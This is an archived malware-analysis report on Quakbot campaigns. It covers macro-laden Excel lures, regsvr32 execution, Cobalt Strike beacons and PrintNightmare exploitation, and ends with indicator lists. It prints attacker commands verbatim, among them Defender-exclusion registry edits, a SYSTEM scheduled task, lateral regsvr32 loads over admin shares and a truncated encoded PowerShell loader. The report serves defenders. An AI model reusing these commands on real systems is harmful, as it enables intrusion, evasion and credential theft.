{ "id": "0c068708-543d-43ee-978e-100e0e534eeb", "created_at": "2026-04-06T00:09:43.338998Z", "updated_at": "2026-04-10T03:24:23.956906Z", "deleted_at": null, "sha1_hash": "c7f8b7c702f4b3dd71b9204ca563ea3994a4e9fe", "title": "Quakbot Strikes with QuakNightmare Exploitation", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6878129, "plain_text": "Quakbot Strikes with QuakNightmare Exploitation\r\nArchived: 2026-04-05 21:25:10 UTC\r\nA Duck Nightmare\r\nQuakbot Strikes with QuakNightmare Exploitation\r\nBy: Max Malyutin – Orion Threat Research Team Leader\r\nThis is part of an extensive series of guides about Malware Protection\r\nPrologue\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 1 of 33\n\nAfter nearly two months of “summer vacation”, Quakbot is back with a new set of skills and tricks. We have\r\nhandled several incident response cases where Quakbot infected organizations through an email as the initial\r\naccess vector (malicious spam distribution campaigns) to deliver a weaponized Microsoft Office Excel document.\r\nWe found that Quakbot threat actors exploited the PrintNightmare vulnerability (CVE-2021-34527 – “Windows\r\nPrint Spooler Remote Code Execution”) in the later stages of the attack to perform privileged file operations and\r\ncode execution via the Windows Print Spooler service. Quakbot also used credential theft functionality to steal\r\nOutlook passwords intended for internal spear-phishing, luring users to interact with the malicious emails to infect\r\nadditional assets.\r\nThe threat actors also deployed Cobalt Strike beacons which allowed them to launch human-operation activities\r\nsuch as lateral movement, discovery, privilege-escalation, etc.\r\nThese actions serve two main objectives – exfiltration of sensitive data and setting up the stage for ransomware\r\nexecution.\r\nQuakbot Overview\r\nQuakbot (also known as Qabot or Qbot) is a modular Banking Trojan, active since the end of 2007. Quakbot\r\noriginally targeted financial sectors to steal credentials, financial information, and web browser data by using web\r\ninjection and browser hooking techniques that allowed it to “redirect” API calls to intercept financial data.\r\nIn the last two years, Quakbot’s targets expanded beyond the financial sector. We have observed victims from the\r\nIT services industry, telecommunications providers, manufacturing facilities and infrastructure companies.\r\nQuakbot threat actors upgraded the range of malicious capabilities and functionality to evade detection and spread\r\nvia different lateral movement techniques.\r\nIn this same period, we also detected Quakbot infections that include ransomware executions. During our threat\r\nintelligence activities and incident response cases we observed instances where Quakbot delivered REvil (A.K.A\r\nSodinokibi) and Egregor ransomware.\r\nCase Overview\r\nIn this report, we will go through Quakbot’s execution tactics, techniques, and procedures (TTPs), and present\r\ndifferent behaviors, methods, tools, and strategies used by threat actors.\r\nDuring the Cynet Orion Research Team’s continuous campaign hunting cycle, we have observed an increase in\r\nmalicious email campaigns using Quakbot. Additionally, we have responded to incidents where companies asked\r\nfor Cynet 360 assistance in Quakbot infections.\r\nThe Quakbot infection has two initial execution paths. We gave them the following names:\r\n1. Datoploader\r\n2. Relativeloader\r\nAs with many infections across organizations today, threat actors obtained an initial foothold through  malicious\r\nemail campaigns that lured users to interact with malicious links or attachments.\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 2 of 33\n\nIn both cases, a malicious link (lead to a ZIP file) or a direct attachment in the malicious email leads to the next\r\nstep of the infection – a weaponized Office document. The weaponized Office document contains macros code\r\n(macro 4.0 XLM) that executes when the user clicks on “Enable Content”.\r\nThe macro execution leads to multi-stage malicious actions that include a command-and-control (C2) connection,\r\ndownload of malicious payloads, and execution of commands.\r\nQuakbot threat actors use several Defense Evasion (TA0005) techniques, such as process injection, masquerading,\r\nFileless executions, etc. to bypass security solutions such as anti-virus and EDR.\r\nThe malicious macro code executes the payload by abusing the legitimate Microsoft file Regsvr32.exe. This type\r\nof procedure is also known as LOLBin (Living Off the Land Binaries), where threat actors abuse legitimate\r\nMicrosoft files instead of bringing their own malicious files. These LOLBins files could be abused for proxy\r\nexecution of processes to bypass whitelisting policies, credential dumping, discovery, and more.\r\nQuakbot Initial Access Execution Flow\r\nInitial Access (TA0001) Phishing (T1566) – distribution via malicious spam campaigns.\r\nExecution (TA0002) User Execution (T1204) – the victim interacts with the malicious link or attachment\r\n(weaponized Office document).\r\nThe victim interacts with the weaponized Office document and enables the macros.\r\nDefense Evasion (TA0005) Signed Binary Proxy Execution: Regsvr32 (T1218.010) – DLL payloads\r\ndownloaded from C2 server and executed via regsvr32.\r\nThe Quakbot payload executes multiple actions including process hollowing injection, Outlook credential theft,\r\nCobalt Strike beacons, and Fileless persistence via registry.\r\nFor the first time, we have observed PrintNightmare exploitation in Quakbot infections.\r\nYou can find an analysis of PrintNightmare at the end of this report.\r\nMITRE Attack Tactics and Techniques Coverage\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 3 of 33\n\nTechnical Analysis: Initial Access and Execution\r\nUpdate by Kevin Beaumont – “Something is going on with Qakbot which alters detection/threat landscape in\r\npast week.”\r\nIt seems that threat actors abused enterprises and corporations that are using MS Exchange on-prem in order to\r\ndistribute malicious emails. This led us to suspect that ProxyLogon and ProxyShell vulnerabilities are being\r\nexploited. These vulnerabilities allow Quakbot threat actors to bypass email security policies and propagate\r\nQuakbot infections.\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 4 of 33\n\nProxyLogon – CVE-2021-26855, CVE-2021-27065\r\nProxyShell – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207\r\nQuakbot “TR” infrastructure stands for the distribution actor name that distributes malicious spam campaigns.\r\nThis name was given by researchers, who also named the actor “ChaserLdr.”\r\nMalicious emails are sent as part of phishing campaigns and contain a link to a compromised URL which leads to\r\nthe ZIP file. The threat actors’ motivation is to lure the victim to interact with the phishing email and download the\r\nZIP file.\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 5 of 33\n\nHere is a URL search on TR campaign URLs that distribute Quakbot ZIP file:\r\nhttps://urlhaus.abuse.ch/browse/tag/TR/\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 6 of 33\n\nThe ZIP file contains the weaponized Excel document. We have identified several unique patterns of the\r\nweaponized Excel document names, including:\r\nmiss-[0-9]{9}.xls\r\ntrend-[0-9]{7}.xls\r\ncharts-[0-9]{10}.xls\r\nClaim-Copy-[0-9]{10}.xls\r\nService-Interrupt-[0-9]{10}.xls\r\nThe weaponized Excel document (Datoploader maldoc) contains a fake Microsoft Office template message which\r\nlures the user to click on two messages:\r\n1. Select “Enable Editing” – Protection View message\r\n2. Select “Enable Content” – Security Warning message\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 7 of 33\n\nThe weaponized Excel document (Relativeloader maldoc) contains a fake DocuSign template message which\r\nlures the user to click on two messages:\r\n1. Select “Enable Editing” – Protection View message\r\n2. Select “Enable Content” – Security Warning message\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 8 of 33\n\nBoth weaponized Excel documents – Datoploader and Relativeloader – contain malicious macro code. Threat\r\nactors crafted these weaponized Excel documents with several tricks to bypass security detections and security\r\nresearchers’ complex analyses.\r\nDatoploader contains macro version 4.0 XLM. These macros hide in different Sheets and hide the macros in a\r\nwhite font with highly obfuscated code.  Evasion techniques include:\r\nHiding sheets in the document\r\nHiding Excel 4.0 macros in different sheets\r\nAutoOpen function – run a macro when Excel starts\r\nHiding the macro formula by applying a white font color\r\nObfuscation and scrambling of the macros in deferent sheets\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 9 of 33\n\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 10 of 33\n\nRelativeloader also contains macro version 4.0 code and a VBA code that protects with a password.  Evasion\r\ntechniques include:\r\nHiding sheet in the document\r\nHiding Excel 4.0 macros in sheet\r\nVBA code protect with password\r\nAutoOpen function – run a macro when Excel starts\r\nHiding the macro formula by applying a black font color\r\nObfuscation and scrambling of the macro\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 11 of 33\n\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 12 of 33\n\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 13 of 33\n\nUpdate (04/11/2021): We observed a new payload name. Threat actors now name the payload:\r\ngood.good\r\ngood1.good\r\ngood2.good\r\nFor the new payload named good.good, here is the macro code with the new format:\r\nRelativeloader and Datoploader highlight keys in the macros code:\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 14 of 33\n\nArtifacts Description\r\nKernel32 CreateDirectoryA\r\nUrlmon URLDownloadToFileA\r\nShell32 ShellExecuteA\r\nWinAPI functions use to download file, create a new\r\ndirectory, and execute process\r\nC:\\Datop\\test.test\r\nC:\\Datop\\test1.test\r\nC:\\Datop\\test2.test\r\nC:\\Datop\\good.good\r\nC:\\Datop\\good1.good\r\nC:\\Datop\\good2.good\r\nNew directory where payload drop.\r\ngood.good is the new version payloads name\r\nregsvr32 -silent ..\\[RandomFileName].\r\n[RandomFileName]\r\nregsvr32.exe C:\\Datop\\test.test\r\nRegsvr32 execution command\r\nhttp://[IP]/[0-9]{5}.[0-9]{10}.dat C2 sever pattern for Relativeloader maldoc\r\nThreat actors abuse Regsvr32.exe (MITRE T1218.010) to proxy execute the malicious payload dropped by the\r\nmacro execution.\r\nTechnical Analysis: Persistence and Defense Evasion\r\nRegsvr32.exe is a legitimate Microsoft file responsible for registering DLL files as command components in the\r\nregistry. This file is also classified as a LOLBin with application whitelisting (AWL) bypass and execute\r\ncapabilities.\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 15 of 33\n\nQuakbot execution flow – Relativeloader:\r\nMalicious Excel macro call process creates (=EXEC) action in order to execute regsvr32 command:\r\nThe regsvr32 command executes the payload with -silent parameter:\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 16 of 33\n\nQuakbot execution flow – Datoploader:\r\nMalicious Excel macro calls process create (ShellExecuteA) action in order to execute regsvr32 command:\r\nIn both cases, the Quakbot execution flow executes the regsvr32 process three times in order to load masqueraded\r\nDLL payloads (test, good, random).\r\nIn this step, the machine is fully compromised and infected and Quakbot is ready to strike with the next attack\r\ntechniques. We discovered that the next step is process injection.\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 17 of 33\n\nQuakbot uses CreateProcessW to create a new process. By default, Quakbot creates an Explore.exe process. There\r\nare two other process which could be injected during the infection:\r\nmsra.exe\r\nOneDriveSetup.exe\r\nThe Regsvr32 (initial Quakbot loader) process opens a handle (0x1fffff == Full control) to the created Explorer\r\nprocess in order to allocate memory for the malicious code.\r\nWriteProcessMemory function – Writes data to an area of memory in a specified process. The first parameter is\r\nhProcess (PID of the target process) and the third parameter is the lpBuffer (the buffer that contains data to be\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 18 of 33\n\nwritten in the address space of the specified process). After the WriteProcessMemory WinAPI function, the\r\nQuakbot malicious function executes and injects PE code inside the RWX page of the targeted Explorer process.\r\nNote: Explorer process executes most of the time from C:\\windows directory and not from\r\nC:\\windows\\Syswow64\\. Additionally, thanks to SANS DFIR – Find Evil – Know Normal’s poster, we can\r\nconfirm that the legitimate parent process of Explorer.exe is userinit.exe. In a Quakbot infection, the parent\r\nprocess of injected Explorer process is Regsvr32.\r\nAfter examining the injected explorer process, we have found the C2 configuration in clear text format in the\r\nmemory:\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 19 of 33\n\nWe have spotted that Quakbot C2 servers’ pattern is https//[IP]/t4\r\nThe injected explorer process creates a Scheduled Task (Scheduled Task/Job: Scheduled Task – T1053.005) with a\r\nrandom name to perform privilege escalation and persistence on the infected machine.\r\nScheduled Task creation command:\r\nschtasks.exe “/Create /RU “NT AUTHORITY\\SYSTEM” /tn [TaskName] /tr “regsvr32.exe -s\r\n\\”C:\\Users\\*\\AppData\\Local\\Temp\\[payload].dll\\”” /SC ONCE /Z /ST [Time] /ET [Time]\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 20 of 33\n\nThe malicious Scheduled Task configured to execute whether or not the user is logged on:\r\nIn addition, we saw another form of task creation where the malicious task executes a PowerShell command\r\nwhich launches FileLess execution from this registry value:\r\nThe Regsvr32 process executed thanks to the malicious Scheduled Task with System User and performed a\r\nprocess injection to Explorer.exe (once more). Additionally, the injected explorer process swapped two new\r\nprocesses of reg.exe.\r\nC:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule; responsible for the below execution:\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 21 of 33\n\nThe first Reg.exe command executed via injected explorer process:\r\nC:\\Windows\\system32\\reg.exe ADD “HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths” /f /t\r\nREG_DWORD /v “C:\\ProgramData\\Microsoft\\[RandomPath]” /d “0”\r\nThe second Reg.exe command executed via injected explorer process:\r\nC:\\Windows\\system32\\reg.exe ADD “HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths” /f /t\r\nREG_DWORD /v “C:\\Users\\*\\AppData\\Roaming\\Microsoft\\[RandomPath]” /d “0”\r\nFurthermore, concerning persistence, we have observed a run key persistence (Boot or Logon Autostart\r\nExecution: Registry Run Keys / Startup Folder – T1547.001):\r\nRegistry Key Value Data\r\nHKEY_CURRENT_USER\\SOFTWARE\\\r\nMicrosoft\\Windows\\CurrentVersion\r\n\\Run\r\nRandom name\r\nFor example:\r\ngbqmhjwbdat\r\nNnrolhjksp\r\niwiqxgkbe\r\nregsvr32.exe -s\r\n“”C:\\Users\\*\\AppData\\Roaming\\\r\nMicrosoft\\[Random]\\[Random].dll””\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 22 of 33\n\nThe excluded paths are the same paths registered in the data of the Run key value, which means that the run key\r\nexecution avoids the Windows Defender detections, Windows Defender does not scan this path and allows the\r\npayloads.\r\nThis action allows threat actors to run the dropped Quakbot payloads from the path added to the Defender\r\nexclusions path:\r\nC:\\Users\\*\\AppData\\Roaming\\Microsoft\\[RandomPath]\r\nC:\\ProgramData\\Microsoft\\ [RandomPath]\r\nMoreover, the initial payloads (test.test or good.good) are overwritten in order to corrupt the artifact:\r\nThe next stage of the attack is related to Outlook passwords theft. Quakbot performs this action via credential theft\r\nfunctionality. We have observed an attempt to query and enumerate registry keys and values which are related to\r\nOutlook passwords (Credentials from Password Stores – T1555).\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 23 of 33\n\nProcesses execution flow:\r\nGrandparent Process:\r\nc:\\windows\\syswow64\\regsvr32.exe C:\\Datop\\(test.test or good.good)\r\nParent Process:\r\nc:\\windows\\syswow64\\explorer.exe\r\nProcess:\r\nc:\\windows\\syswow64\\explorer.exe\r\nQuakbot query value key (RegNtPreQueryValueKey) in order to collect data from:\r\nRegistry Keys: Registry values\r\nHKCU:\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\r\nMESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\*\r\nIMAP\r\nPASSWORD\r\nPOP3\r\nPASSWORD\r\nSMTP\r\nPASSWORD\r\nHKCU:\\SOFTWARE\\Microsoft\\Office\\*\\Outlook\\Profiles\\ \\OUTLOOK\\*\r\nHKCU:\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING\r\nSUBSYSTEM\\PROFILES\\*\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 24 of 33\n\nTechnical Analysis: Discovery\r\nThe injected process also performed discovery basics commands. We have observed the following legitimate\r\nMicrosoft binaries used for the discovery execution:\r\nsysteminfo.exe\r\narp.exe\r\nnet.exe\r\nipconfig.exe\r\nnetstat.exe\r\nnltest.exe\r\nschtasks.exe\r\nqwinsta.exe\r\nnslookup.exe\r\nroute.exe\r\nwhoami /all\r\narp -a\r\nschtasks.exe /Query /V /FO LIST /TN {*}\r\nnltest /domain_trusts /all_trusts\r\nqwinsta\r\nnslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.IPER\r\nroute print\r\nnet accounts/domain\r\nsysteminfo, arp, netstat and ipconfig commands were used to gather information on the infected machine. Net and\r\nnltest commands were used to collect information on the domain network. This information allows the threat\r\nactors to plan the next steps to execute lateral movement and privilege escalation. The main goal at this point is to\r\npivot to the Domain Controller server and access the Domain Admin user.\r\nAdditionally, we have observed a new Discovery execution flow via an encoded PowerShell command:\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 25 of 33\n\nThe decoded malicious command:\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 26 of 33\n\nAdfind.exe commands executed as part of the Discovery action:\r\nadfind.exe -f objectcategory=computer -csv name cn OperatingSystem dNSHostName\r\nadfind.exe -b dc=*,dc=* -f objectcategory=computer -csv name cn OperatingSystem dNSHostName\r\nTechnical Analysis: Lateral Movement\r\nQuakbot used lateral movement techniques by abusing services (Remote Services T1021) in order to spread\r\nQuakbot DLLs in network shared folders.\r\nParent Process:\r\nc:\\windows\\system32\\services.exe\r\nProcess:\r\nregsvr32.exe -s \\\\[IP]\\C$\\[RandomName].dll\r\nregsvr32.exe -s \\\\[IP]\\ADMIN$\\[RandomName].dll\r\nregsvr32.exe -s \\\\[IP]\\\\print$\\[RandomName].dll\r\nTechnical Analysis: Cobalt Strike Activity\r\nWe have observed Cobalt Strike execution in few forms via PowerShell Fileless script, process injection, and DLL\r\nbeacons. Cobalt Strike process injection, the injected explorer (by Quakbot) is pivoting to another process to inject\r\nthe Cobalt Strike shell code to a new process, for example, we have detected an injection to dllhost.exe by creating\r\na remote thread on the new injected process.\r\nc:\\windows\\syswow64\\explorer.exe \u003e c:\\windows\\syswow64\\dllhost.exe\r\nInjected dllhost Page Metadata:\r\nState=4096 (MEM_COMMIT 0x00001000), Type=131072(MEM_RESERVE 0x00002000),\r\nAllocationProtect=4 (PAGE_EXECUTE_READWRITE 0x40)\r\nAnother Cobalt Strike injected known processes which we have observed during incident response cases:\r\n\\sysnative\\werfault.exe\r\n\\sysnative\\regsvr32.exe\r\n\\sysnative\\userinit.exe\r\n\\ sysnative\\mstsc.exe\r\n\\sysnative\\net.exe\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 27 of 33\n\n\\sysnative\\svchost.exe\r\n\\sysnative\\gpupdate.exe\r\n\\sysnative\\lsass.exe\r\n\\sysnative\\searchindexer.exe\r\nCobalt Strike beacons – As we mentioned, the threat actors excluded two paths. One of these paths is\r\nC:\\programdata\\Microsoft\\:\r\nC:\\Windows\\system32\\reg.exe ADD “HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths” /f /t\r\nREG_DWORD /v “C:\\ProgramData\\Microsoft\\[RandomPath]” /d “0”\r\nWe observed that the Cobalt Strike beacons dropped to this directory:\r\nCS beacon location:\r\nc:\\programdata\\microsoft\\[Random]\\[Random].dllExecution command-line:\r\nregsvr32.exe -s ” c:\\programdata\\microsoft\\[Random]\\[Random].dll”\r\nIn addition, we detected an attempt to launch Cobalt Strike Fileless execution via a malicious PowerShell\r\ncommand.\r\nParent Process:\r\nc:\\windows\\system32\\services.exeProcess:\r\nC:\\windows\\system32\\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand\r\nJABzAD0ATgBlA…=\r\nDecoded base64 command:\r\n$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“H4sIAAAAAAAAAK1WbXPaOBD…\r\n“));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,\r\n[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();\r\nGzipStream decompress and FromBase64String, next stage decode command:\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 28 of 33\n\nIn order to decode the Cobalt Strike shellcode, we have used this section:\r\nVia CyberChef “bake” we get the clear text shellcode, From Base64 ($var_code) and XOR key (bxor 35 hex):\r\nThe shellcode contains “\\\\.\\pipe\\mojo.5688.805…”  string that represents the Cobalt Strike beacon pipe inter-process (IPC) mechanism for communication by using CreateNamePipe and ConnectNamePipe.\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 29 of 33\n\nCobalt Strike beacon common pipe pattern\r\n\\\\.\\pipe\\mojo.5688.805\r\nThe self-injected PowerShell process used a PsExec Cobalt Strike module in order to drop additional Cobalt\r\nStrike beacons on other machines in the domain through share folders.\r\n\\\\[Host.Doamin]\\admin$\\[0-9]{7}.exe == C:\\Windows\\[0-9]{7}.exe\r\nTechnical Analysis: PrintNightmare\r\nPrintNightmare is a Windows Print Spooler Remote Code Execution (RCE) Vulnerability (CVE 2021 34527) that\r\nallows performing privileged file operations via Windows Print Spooler service. Quakbot threat actors\r\nsuccessfully exploited this vulnerability and got SYSTEM privileges execution to execute malicious code. Threat\r\nactors exploited the PrintNightmare, Print Spooler service (spoolsv.exe), created a DLL payload in\r\nthe C:\\Windows\\System32\\spool\\drivers\\x64\\3\\ path, the payload name spider.dll.\r\nSpoolsv.exe process configured the DLL payload by abusing the Printer registry key and created a new key named\r\n“123456”.\r\nRegistry key:\r\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\123456\r\nDLLs payload path:\r\nC:\\Windows\\System32\\spool\\drivers\\x64\\3\\spider.dll\r\nThe Print driver key contains values “Configuration File” and “Data File” with the payload DLL name (spider.dll).\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 30 of 33\n\nAfter the exploitation the QuakNightmare process (spoolsv.exe) executed CMD command:\r\nC:\\WINDOWS\\system32\\cmd.exe /c cmd.exe /c C:\\Users\\Public\\25443.exe\r\nFinal Thoughts\r\nOur investigation is still active as we have collected more information and logs from several IR cases of Quakbot\r\ninfections. We believe that the main goals of the threat actors are to exfiltrate sensitive data and information, and\r\nto execute a ransomware attack as we have seen in the past. In addition, we have discovered that Quakbot threat\r\nactors abused organizational stolen email credentials to spread new Quakbot campaigns upon additional victims.\r\nWe will provide updates on any new discoveries from our ongoing Quakbot investigation.\r\nINDICATORS OF COMPROMISE\r\nType Indicator of Compromise\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 31 of 33\n\nWeaponized Office Documents\r\na45df331c681b7e73faf94527cd19a9de28e7f0aa10556a18cb48f7db685ce87\r\naff999aa8b0cb088f858429aeb0f18dd81337981f807c7aa98d95d9ddae34050\r\nc0168eaf2e409a8d1a968e388d665b213b1f7ae232c24df90ab8731b5fd1cbbd\r\n73249da46ad32f57b75746421ca8d96bc62ce7670a7738bfede3d086826e8a87\r\nef0156fd34e136841f28df011c2ecddf58ee4dcf839d25692b52e086beb98d38\r\n511650dfa48dbea1062ba58fc65b52caacbd4b6a752e40f2c3f8c16f1273c68b\r\n40b203a7b40ba1188d0a56a486eac6d4c289ee6ef3a32ec07c245ef44f325a95\r\n4d1a2e62c2f1d7d9d7ef0b81152bfcc85d68bac0c7ab13b8ed6d03ae27f3dda0\r\n6ca376cd53db43cc7781db3e03782ab28213ed722a52e0d38927d3aba516d9b6\r\nZIP Files\r\nc1262d13d3809b9d44a6829357c305308567ae8aeca873cc33307e1eda3a9615\r\n78bccdfce650d1b0c3023ed1cf7174625e88af831865a926c927a320c1177e10\r\n086e81e972597d576da5e7f43f12d5814c78acc5881e6bdc58e5659ee42c264f\r\nDLL payloads\r\n9e63072408a8d0e91a260ae861efb4f64b5585d61a31eeb35c7a2fb595198d2c\r\n9a8dabf648db1df5bfd90f49233fe2d15a4af71792cc337abe1e60289ede7dc1\r\n236f9f37dc2604ed8d3faee0b07fc6bb8f4dde68ed89a137023f641ad6076ca4\r\n57f5a2a3e5f5fd1fcd95aa1896e6a104973cc90a3a6a25393b9b1da053f93092\r\n5896105dd86060733851505905f1e29e0e7dd9ade5b310a0298414d441a7da70\r\naff67b2d5bd2634a6d1800e9c2b2232ad6d09b59e1971afb6b04ea3be477d8cd\r\nd59ea14883b19cd3a51c3742d5e86e474266b9fec821b0b5fbd6ec7b55eb58bc\r\n00eeb0fa83ffd92aaee10d2cf851597f429062ea044863e425be8801a41ef379\r\n7af572d912a2bff85817165acc672ef17f1fd776ea03bcb5cbb848604ba46fbf\r\nCommand and Control Server\r\n190[.]73[.]3[.]148\r\n177[.]172[.]5[.]228\r\n181[.]118[.]183[.]27\r\n71[.]13[.]93[.]154\r\n216[.]238[.]71[.]31\r\n216[.]238[.]72[.]121\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 32 of 33\n\n45[.]9[.]20[.]200\r\n93[.]48[.]80[.]198\r\n86[.]98[.]1[.]197\r\n207[.]246[.]112[.]221\r\n123[.]252[.]190[.]14\r\nPayload Paths\r\nC:\\Datop\\test.test\r\nC:\\Datop\\test1.test\r\nC:\\Datop\\test2.test\r\nC:\\Datop\\good.good\r\nC:\\Datop\\good1.good\r\nC:\\Datop\\good2.good\r\nSource: https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nhttps://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\r\nPage 33 of 33", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/" ], "report_names": [ "quakbot-strikes-with-quaknightmare-exploitation" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434183, "ts_updated_at": 1775791463, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c7f8b7c702f4b3dd71b9204ca563ea3994a4e9fe.pdf", "text": "https://archive.orkl.eu/c7f8b7c702f4b3dd71b9204ca563ea3994a4e9fe.txt", "img": "https://archive.orkl.eu/c7f8b7c702f4b3dd71b9204ca563ea3994a4e9fe.jpg" } }